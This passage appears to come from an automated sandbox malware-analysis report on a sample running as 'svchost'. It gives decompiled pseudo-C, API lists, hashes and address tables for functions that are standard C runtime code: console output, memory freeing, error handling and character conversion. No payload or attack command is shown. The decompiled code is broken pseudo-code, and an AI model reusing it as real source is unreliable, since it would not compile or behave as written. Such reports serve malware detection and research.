                                                • Instruction ID: f46d3fe0414aebd91d1bf00773a91dcde5a1231c644df61b62a4b100bc10cf54
                                                • Opcode Fuzzy Hash: 9a532973fa5698834d3ca7e6d144c450cae51f17c42fd2a73e96782de38ef112
                                                • Instruction Fuzzy Hash: E5B15C7590561ADFDB24DF98C885AADB7B8FF48304F1446EAE849A7350D731AE90CF80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 039AE484 Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free
                                                • String ID:
                                                • API String ID: 269201875-0
                                                • Opcode ID: d16d7271aec1b4bdc52d1b86dfd349aea82be587408fb65cb762ab55911e840f
                                                • Instruction ID: a71827f5a67f382a286bf42fece0cc35c6c586b3c92050d4f1ecabe4f9856933
                                                • Opcode Fuzzy Hash: d16d7271aec1b4bdc52d1b86dfd349aea82be587408fb65cb762ab55911e840f
                                                • Instruction Fuzzy Hash: 0C61A075D04705AFDB20EFACC840B9ABBF9EF84750F1446AAE944EB341E7709D418BA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 6FD5C516 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 73%
                                                			E6FD5C516(void* __ebx, void* __edi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				void* __esi;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t134;
				signed int _t135;
				void* _t136;

				_t78 =  *0x6fd68008; // 0xc92c5105
				_v8 = _t78 ^ _t135;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t116 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x6fd6b358 + _t118 * 4)) + _t116 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t134 = _a4;
				_v60 = _t86;
				 *_t134 = 0;
				 *((intOrPtr*)(_t134 + 4)) = 0;
				 *((intOrPtr*)(_t134 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x6fd6b358 + _v48 * 4));
					_t123 =  *(_t129 + _t116 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E6FD5C1E3(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x6fd6b358 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x6fd6b358 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x6fd6b358 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t134 + 4)) =  *((intOrPtr*)(_t134 + 4)) + 1;
							} else {
								_t112 = E6FD5AD52( &_v28, _t133, 2);
								_t136 = _t136 + 0xc;
								if(_t112 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t116 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E6FD5AD52();
						_t136 = _t136 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
									L19:
									 *_t134 = GetLastError();
								} else {
									 *((intOrPtr*)(_t134 + 4)) =  *((intOrPtr*)(_t134 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t134 + 8)) =  *((intOrPtr*)(_t134 + 8)) + 1;
													 *((intOrPtr*)(_t134 + 4)) =  *((intOrPtr*)(_t134 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E6FD5599E(_v8 ^ _t135, _t134);
			}



































                                                0x6fd5c51e
                                                0x6fd5c525
                                                0x6fd5c528
                                                0x6fd5c530
                                                0x6fd5c534
                                                0x6fd5c540
                                                0x6fd5c543
                                                0x6fd5c546
                                                0x6fd5c54d
                                                0x6fd5c555
                                                0x6fd5c558
                                                0x6fd5c55e
                                                0x6fd5c564
                                                0x6fd5c569
                                                0x6fd5c56b
                                                0x6fd5c56e
                                                0x6fd5c573
                                                0x6fd5c57d
                                                0x6fd5c584
                                                0x6fd5c587
                                                0x6fd5c58e
                                                0x6fd5c595
                                                0x6fd5c5c1
                                                0x6fd5c5e7
                                                0x6fd5c5e9
                                                0x00000000
                                                0x6fd5c5c3
                                                0x6fd5c5c6
                                                0x6fd5c68d
                                                0x6fd5c699
                                                0x6fd5c6a4
                                                0x6fd5c6a9
                                                0x6fd5c5cc
                                                0x6fd5c5d3
                                                0x6fd5c5d8
                                                0x6fd5c5de
                                                0x6fd5c5e4
                                                0x00000000
                                                0x6fd5c5e4
                                                0x6fd5c5de
                                                0x6fd5c5c6
                                                0x6fd5c597
                                                0x6fd5c59b
                                                0x6fd5c59e
                                                0x6fd5c5a4
                                                0x6fd5c5a6
                                                0x6fd5c5a9
                                                0x6fd5c5ad
                                                0x6fd5c5ea
                                                0x6fd5c5ed
                                                0x6fd5c5ee
                                                0x6fd5c5f3
                                                0x6fd5c5f9
                                                0x6fd5c5ff
                                                0x6fd5c60e
                                                0x6fd5c614
                                                0x6fd5c61a
                                                0x6fd5c61f
                                                0x6fd5c63b
                                                0x6fd5c6ae
                                                0x6fd5c6b4
                                                0x6fd5c63d
                                                0x6fd5c645
                                                0x6fd5c64e
                                                0x6fd5c654
                                                0x00000000
                                                0x6fd5c656
                                                0x6fd5c658
                                                0x6fd5c65b
                                                0x6fd5c674
                                                0x00000000
                                                0x6fd5c676
                                                0x6fd5c67a
                                                0x6fd5c67c
                                                0x6fd5c67f
                                                0x00000000
                                                0x6fd5c67f
                                                0x6fd5c67a
                                                0x6fd5c674
                                                0x6fd5c654
                                                0x6fd5c64e
                                                0x6fd5c63b
                                                0x6fd5c61f
                                                0x6fd5c5f9
                                                0x00000000
                                                0x6fd5c682
                                                0x6fd5c682
                                                0x6fd5c6b6
                                                0x6fd5c6c8

                                                APIs
                                                • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,6FD5CC8B,?,00000000,?,00000000,00000000), ref: 6FD5C558
                                                • __fassign.LIBCMT ref: 6FD5C5D3
                                                • __fassign.LIBCMT ref: 6FD5C5EE
                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 6FD5C614
                                                • WriteFile.KERNEL32(?,?,00000000,6FD5CC8B,00000000,?,?,?,?,?,?,?,?,?,6FD5CC8B,?), ref: 6FD5C633
                                                • WriteFile.KERNEL32(?,?,00000001,6FD5CC8B,00000000,?,?,?,?,?,?,?,?,?,6FD5CC8B,?), ref: 6FD5C66C
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                • String ID:
                                                • API String ID: 1324828854-0
                                                • Opcode ID: 0850d3248375cff0b1fc1778b4f64f5089c10de9b6815f485b5e22b4f9fd4f29
                                                • Instruction ID: 770e54b0a5a02cc7334123b241e1d85f5e824fe8f2b19b4f2038126703253173
                                                • Opcode Fuzzy Hash: 0850d3248375cff0b1fc1778b4f64f5089c10de9b6815f485b5e22b4f9fd4f29
                                                • Instruction Fuzzy Hash: 85517DB1A002499FDF11CFB8C881AEEBBF4EF49310F14415AE555E7291E730BA60CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 039AA412 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,039AAB87,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 039AA454
                                                • __fassign.LIBCMT ref: 039AA4CF
                                                • __fassign.LIBCMT ref: 039AA4EA
                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 039AA510
                                                • WriteFile.KERNEL32(?,FF8BC35D,00000000,039AAB87,00000000,?,?,?,?,?,?,?,?,?,039AAB87,?), ref: 039AA52F
                                                • WriteFile.KERNEL32(?,?,00000001,039AAB87,00000000,?,?,?,?,?,?,?,?,?,039AAB87,?), ref: 039AA568
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                • String ID:
                                                • API String ID: 1324828854-0
                                                • Opcode ID: 52e5ced389732443d417073694a48f4ac5ff371b29cbae9ea9ad52af16f89632
                                                • Instruction ID: 4e885066287cfaf58324ef42eaf3d490ca4659d5451a9ea9fd020444c3646738
                                                • Opcode Fuzzy Hash: 52e5ced389732443d417073694a48f4ac5ff371b29cbae9ea9ad52af16f89632
                                                • Instruction Fuzzy Hash: 1151D471E046099FDB10CFACD885AEEFBF8EF49310F14465AE956EB241E7309941CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 6FD5D870 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E6FD5D870(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E6FD5D834(_t45, 7);
					E6FD5D834(_t45 + 0x1c, 7);
					E6FD5D834(_t45 + 0x38, 0xc);
					E6FD5D834(_t45 + 0x68, 0xc);
					E6FD5D834(_t45 + 0x98, 2);
					E6FD59FB4( *((intOrPtr*)(_t45 + 0xa0)));
					E6FD59FB4( *((intOrPtr*)(_t45 + 0xa4)));
					E6FD59FB4( *((intOrPtr*)(_t45 + 0xa8)));
					E6FD5D834(_t45 + 0xb4, 7);
					E6FD5D834(_t45 + 0xd0, 7);
					E6FD5D834(_t45 + 0xec, 0xc);
					E6FD5D834(_t45 + 0x11c, 0xc);
					E6FD5D834(_t45 + 0x14c, 2);
					E6FD59FB4( *((intOrPtr*)(_t45 + 0x154)));
					E6FD59FB4( *((intOrPtr*)(_t45 + 0x158)));
					E6FD59FB4( *((intOrPtr*)(_t45 + 0x15c)));
					return E6FD59FB4( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}




                                                0x6fd5d876
                                                0x6fd5d87b
                                                0x6fd5d884
                                                0x6fd5d88f
                                                0x6fd5d89a
                                                0x6fd5d8a5
                                                0x6fd5d8b3
                                                0x6fd5d8be
                                                0x6fd5d8c9
                                                0x6fd5d8d4
                                                0x6fd5d8e2
                                                0x6fd5d8f0
                                                0x6fd5d901
                                                0x6fd5d90f
                                                0x6fd5d91d
                                                0x6fd5d928
                                                0x6fd5d933
                                                0x6fd5d93e
                                                0x00000000
                                                0x6fd5d94e
                                                0x6fd5d953

                                                APIs
                                                  • Part of subcall function 6FD5D834: _free.LIBCMT ref: 6FD5D85D
                                                • _free.LIBCMT ref: 6FD5D8BE
                                                  • Part of subcall function 6FD59FB4: HeapFree.KERNEL32(00000000,00000000,?,6FD5D862,?,00000000,?,00000000,?,6FD5D889,?,00000007,?,?,6FD5D4FB,?), ref: 6FD59FCA
                                                  • Part of subcall function 6FD59FB4: GetLastError.KERNEL32(?,?,6FD5D862,?,00000000,?,00000000,?,6FD5D889,?,00000007,?,?,6FD5D4FB,?,?), ref: 6FD59FDC
                                                • _free.LIBCMT ref: 6FD5D8C9
                                                • _free.LIBCMT ref: 6FD5D8D4
                                                • _free.LIBCMT ref: 6FD5D928
                                                • _free.LIBCMT ref: 6FD5D933
                                                • _free.LIBCMT ref: 6FD5D93E
                                                • _free.LIBCMT ref: 6FD5D949
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 6eeaca6fd720981fe17979740369c31a5c33e6d791374819849b7ddb0d78f749
                                                • Instruction ID: 3bd02b5f0887bdff621ea289a9772ae9ee0011ed3740e049ad63daa7bc0ff5ab
                                                • Opcode Fuzzy Hash: 6eeaca6fd720981fe17979740369c31a5c33e6d791374819849b7ddb0d78f749
                                                • Instruction Fuzzy Hash: A01154B1545B04A6DEA0ABB4CC05FCFBB9E5F00748F400915A7AD6A3D0D775F524C671
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 039AE959 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 039AE6A0: _free.LIBCMT ref: 039AE6C9
                                                • _free.LIBCMT ref: 039AE9A7
                                                  • Part of subcall function 039A496C: HeapFree.KERNEL32(00000000,00000000,?,039AE6CE,?,00000000,?,00000000,?,039AE972,?,00000007,?,?,039AC3DB,?), ref: 039A4982
                                                  • Part of subcall function 039A496C: GetLastError.KERNEL32(?,?,039AE6CE,?,00000000,?,00000000,?,039AE972,?,00000007,?,?,039AC3DB,?,?), ref: 039A4994
                                                • _free.LIBCMT ref: 039AE9B2
                                                • _free.LIBCMT ref: 039AE9BD
                                                • _free.LIBCMT ref: 039AEA11
                                                • _free.LIBCMT ref: 039AEA1C
                                                • _free.LIBCMT ref: 039AEA27
                                                • _free.LIBCMT ref: 039AEA32
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 9bc8c3e54f5c8dae5663f75ff40172627b974c9512e873cbc2ef3ff916828a46
                                                • Instruction ID: 230e43af5c9f9d3a1bc478325ce07b3ec9279a2d9b3d7dc90e91a8b8ef48c555
                                                • Opcode Fuzzy Hash: 9bc8c3e54f5c8dae5663f75ff40172627b974c9512e873cbc2ef3ff916828a46
                                                • Instruction Fuzzy Hash: 6A112C75D44F04EAD560FBB5CC05FCBBBAC6FC0700F804E15B29AAE151DA65B9154690
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 6FD580F4 Relevance: 10.5, APIs: 7, Instructions: 48COMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E6FD580F4(void* __ecx) {
				void* _t5;
				void* _t6;
				void* _t9;
				void* _t15;
				long _t16;
				void* _t17;
				void* _t20;
				void* _t21;

				if( *0x6fd69450 != 0xffffffff) {
					_t16 = GetLastError();
					_t20 = E6FD58903(__eflags,  *0x6fd69450);
					_t9 = _t15;
					__eflags = _t20;
					if(_t20 == 0) {
						_t21 = E6FD5A03C(_t9, 1, 0x28);
						__eflags = _t21;
						if(__eflags == 0) {
							L6:
							SetLastError(_t16);
							_t17 = 0;
						} else {
							_t6 = E6FD5893D(__eflags,  *0x6fd69450, _t21);
							__eflags = _t6;
							if(_t6 != 0) {
								SetLastError(_t16);
								_t17 = _t21;
								_t21 = 0;
								__eflags = 0;
							} else {
								goto L6;
							}
						}
						E6FD59FB4(_t21);
						_t5 = _t17;
					} else {
						SetLastError(_t16);
						_t5 = _t20;
					}
					return _t5;
				} else {
					return 0;
				}
			}











                                                0x6fd580fb
                                                0x6fd5810e
                                                0x6fd58115
                                                0x6fd58117
                                                0x6fd58118
                                                0x6fd5811a
                                                0x6fd58130
                                                0x6fd58134
                                                0x6fd58136
                                                0x6fd5814a
                                                0x6fd5814b
                                                0x6fd58151
                                                0x6fd58138
                                                0x6fd5813f
                                                0x6fd58146
                                                0x6fd58148
                                                0x6fd58156
                                                0x6fd5815c
                                                0x6fd5815e
                                                0x6fd5815e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x6fd58148
                                                0x6fd58161
                                                0x6fd58167
                                                0x6fd5811c
                                                0x6fd5811d
                                                0x6fd58123
                                                0x6fd58123
                                                0x6fd5816b
                                                0x6fd580fd
                                                0x6fd580ff
                                                0x6fd580ff

                                                APIs
                                                • GetLastError.KERNEL32(00000001,00000000,6FD574B6,6FD55AB7,6FD55D5E,?,6FD55F5B,?,00000001,?,?,00000001,?,6FD66800,0000000C,6FD56064), ref: 6FD58102
                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6FD58110
                                                • SetLastError.KERNEL32(00000000,6FD55F5B,?,00000001,?,?,00000001,?,6FD66800,0000000C,6FD56064,?,00000001,?), ref: 6FD5811D
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: ErrorLast$Value___vcrt_
                                                • String ID:
                                                • API String ID: 483936075-0
                                                • Opcode ID: b94fa36f6046b30c82cb5bfa083935a8d2ce9f0c189e3d88be474c2c4125b891
                                                • Instruction ID: 09e1bd80d68e27285450592b36ad6e617bf790c15a98ae06ad1a2410337aa0ad
                                                • Opcode Fuzzy Hash: b94fa36f6046b30c82cb5bfa083935a8d2ce9f0c189e3d88be474c2c4125b891
                                                • Instruction Fuzzy Hash: E9F0F43F55CB20DBAF910335980896A27549B87B76F150216F914D6284DF207421E7F1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0399EC70 Relevance: 10.5, APIs: 7, Instructions: 48COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetLastError.KERNEL32(-FC63E248,00000004,0399EC67,0399C031,03995B80), ref: 0399EC7E
                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0399EC8C
                                                • SetLastError.KERNEL32(00000000,?,73BB4020), ref: 0399EC99
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$Value___vcrt_
                                                • String ID:
                                                • API String ID: 483936075-0
                                                • Opcode ID: 5095162262afdf28cdd414ebf2e4b23e23746cd5cae1b9bdd35082646f71e1d9
                                                • Instruction ID: c2ae847a4e4aa44919292be5a45c85aef1a997c7dcab72dd1f120efad485b410
                                                • Opcode Fuzzy Hash: 5095162262afdf28cdd414ebf2e4b23e23746cd5cae1b9bdd35082646f71e1d9
                                                • Instruction Fuzzy Hash: 73F02D3AE0D71057EE31F73EBD0857F26589BC5AF27154126F4019E185FF20880163D0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 6FD5D05E Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 69%
                                                			E6FD5D05E(void* __ebx, void* __ecx, void* __edi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				void* __esi;
				signed int _t49;
				signed int _t54;
				int _t58;
				signed int _t60;
				short* _t62;
				signed int _t66;
				short* _t70;
				int _t71;
				int _t78;
				short* _t81;
				signed int _t87;
				signed int _t90;
				void* _t95;
				void* _t96;
				int _t98;
				short* _t101;
				int _t103;
				void* _t104;
				signed int _t106;
				short* _t107;
				void* _t110;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x6fd68008; // 0xc92c5105
				_v8 = _t49 ^ _t106;
				_t103 = _a20;
				if(_t103 > 0) {
					_t78 = E6FD5DE00(_a16, _t103);
					_t110 = _t78 - _t103;
					_t4 = _t78 + 1; // 0x1
					_t103 = _t4;
					if(_t110 >= 0) {
						_t103 = _t78;
					}
				}
				_t98 = _a32;
				if(_t98 == 0) {
					_t98 =  *( *_a4 + 8);
					_a32 = _t98;
				}
				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					_pop(_t104);
					return E6FD5599E(_v8 ^ _t106, _t104);
				} else {
					_t95 = _t54 + _t54;
					_t85 = _t95 + 8;
					asm("sbb eax, eax");
					if((_t95 + 0x00000008 & _t54) == 0) {
						_t81 = 0;
						__eflags = 0;
						L14:
						if(_t81 == 0) {
							L36:
							_t105 = 0;
							L37:
							E6FD5D2C6(_t81);
							goto L38;
						}
						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
						_t121 = _t58;
						if(_t58 == 0) {
							goto L36;
						}
						_t100 = _v12;
						_t60 = E6FD5A637(_t85, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
						_t105 = _t60;
						if(_t105 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t96 = _t105 + _t105;
							_t87 = _t96 + 8;
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							__eflags = _t87 & _t60;
							if((_t87 & _t60) == 0) {
								_t101 = 0;
								__eflags = 0;
								L30:
								__eflags = _t101;
								if(__eflags == 0) {
									L35:
									E6FD5D2C6(_t101);
									goto L36;
								}
								_t62 = E6FD5A637(_t87, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
								__eflags = _t62;
								if(_t62 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
								__eflags = _t105;
								if(_t105 != 0) {
									E6FD5D2C6(_t101);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t90 = _t96 + 8;
							__eflags = _t96 - _t90;
							asm("sbb eax, eax");
							_t66 = _t60 & _t90;
							_t87 = _t96 + 8;
							__eflags = _t66 - 0x400;
							if(_t66 > 0x400) {
								__eflags = _t96 - _t87;
								asm("sbb eax, eax");
								_t101 = E6FD59FEE(_t87, _t66 & _t87);
								_pop(_t87);
								__eflags = _t101;
								if(_t101 == 0) {
									goto L35;
								}
								 *_t101 = 0xdddd;
								L28:
								_t101 =  &(_t101[4]);
								goto L30;
							}
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							E6FD5FCD0();
							_t101 = _t107;
							__eflags = _t101;
							if(_t101 == 0) {
								goto L35;
							}
							 *_t101 = 0xcccc;
							goto L28;
						}
						_t70 = _a28;
						if(_t70 == 0) {
							goto L37;
						}
						_t125 = _t105 - _t70;
						if(_t105 > _t70) {
							goto L36;
						}
						_t71 = E6FD5A637(0, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
						_t105 = _t71;
						if(_t71 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t72 = _t54 & _t95 + 0x00000008;
					_t85 = _t95 + 8;
					if((_t54 & _t95 + 0x00000008) > 0x400) {
						__eflags = _t95 - _t85;
						asm("sbb eax, eax");
						_t81 = E6FD59FEE(_t85, _t72 & _t85);
						_pop(_t85);
						__eflags = _t81;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t81 = 0xdddd;
						L12:
						_t81 =  &(_t81[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E6FD5FCD0();
					_t81 = _t107;
					if(_t81 == 0) {
						goto L36;
					}
					 *_t81 = 0xcccc;
					goto L12;
				}
			}




























                                                0x6fd5d063
                                                0x6fd5d064
                                                0x6fd5d065
                                                0x6fd5d06c
                                                0x6fd5d071
                                                0x6fd5d077
                                                0x6fd5d07d
                                                0x6fd5d083
                                                0x6fd5d086
                                                0x6fd5d086
                                                0x6fd5d089
                                                0x6fd5d08b
                                                0x6fd5d08b
                                                0x6fd5d089
                                                0x6fd5d08d
                                                0x6fd5d092
                                                0x6fd5d099
                                                0x6fd5d09c
                                                0x6fd5d09c
                                                0x6fd5d0b8
                                                0x6fd5d0be
                                                0x6fd5d0c3
                                                0x6fd5d256
                                                0x6fd5d25a
                                                0x6fd5d269
                                                0x6fd5d0c9
                                                0x6fd5d0c9
                                                0x6fd5d0cc
                                                0x6fd5d0d1
                                                0x6fd5d0d5
                                                0x6fd5d129
                                                0x6fd5d129
                                                0x6fd5d12b
                                                0x6fd5d12d
                                                0x6fd5d24b
                                                0x6fd5d24b
                                                0x6fd5d24d
                                                0x6fd5d24e
                                                0x00000000
                                                0x6fd5d254
                                                0x6fd5d13e
                                                0x6fd5d144
                                                0x6fd5d146
                                                0x00000000
                                                0x00000000
                                                0x6fd5d14c
                                                0x6fd5d15e
                                                0x6fd5d163
                                                0x6fd5d167
                                                0x00000000
                                                0x00000000
                                                0x6fd5d174
                                                0x6fd5d1ae
                                                0x6fd5d1b1
                                                0x6fd5d1b4
                                                0x6fd5d1b6
                                                0x6fd5d1b8
                                                0x6fd5d1ba
                                                0x6fd5d206
                                                0x6fd5d206
                                                0x6fd5d208
                                                0x6fd5d208
                                                0x6fd5d20a
                                                0x6fd5d244
                                                0x6fd5d245
                                                0x00000000
                                                0x6fd5d24a
                                                0x6fd5d21e
                                                0x6fd5d223
                                                0x6fd5d225
                                                0x00000000
                                                0x00000000
                                                0x6fd5d229
                                                0x6fd5d22a
                                                0x6fd5d22b
                                                0x6fd5d22e
                                                0x6fd5d26a
                                                0x6fd5d26d
                                                0x6fd5d230
                                                0x6fd5d230
                                                0x6fd5d231
                                                0x6fd5d231
                                                0x6fd5d23e
                                                0x6fd5d240
                                                0x6fd5d242
                                                0x6fd5d273
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x6fd5d242
                                                0x6fd5d1bc
                                                0x6fd5d1bf
                                                0x6fd5d1c1
                                                0x6fd5d1c3
                                                0x6fd5d1c5
                                                0x6fd5d1c8
                                                0x6fd5d1cd
                                                0x6fd5d1e8
                                                0x6fd5d1ea
                                                0x6fd5d1f4
                                                0x6fd5d1f6
                                                0x6fd5d1f7
                                                0x6fd5d1f9
                                                0x00000000
                                                0x00000000
                                                0x6fd5d1fb
                                                0x6fd5d201
                                                0x6fd5d201
                                                0x00000000
                                                0x6fd5d201
                                                0x6fd5d1cf
                                                0x6fd5d1d1
                                                0x6fd5d1d5
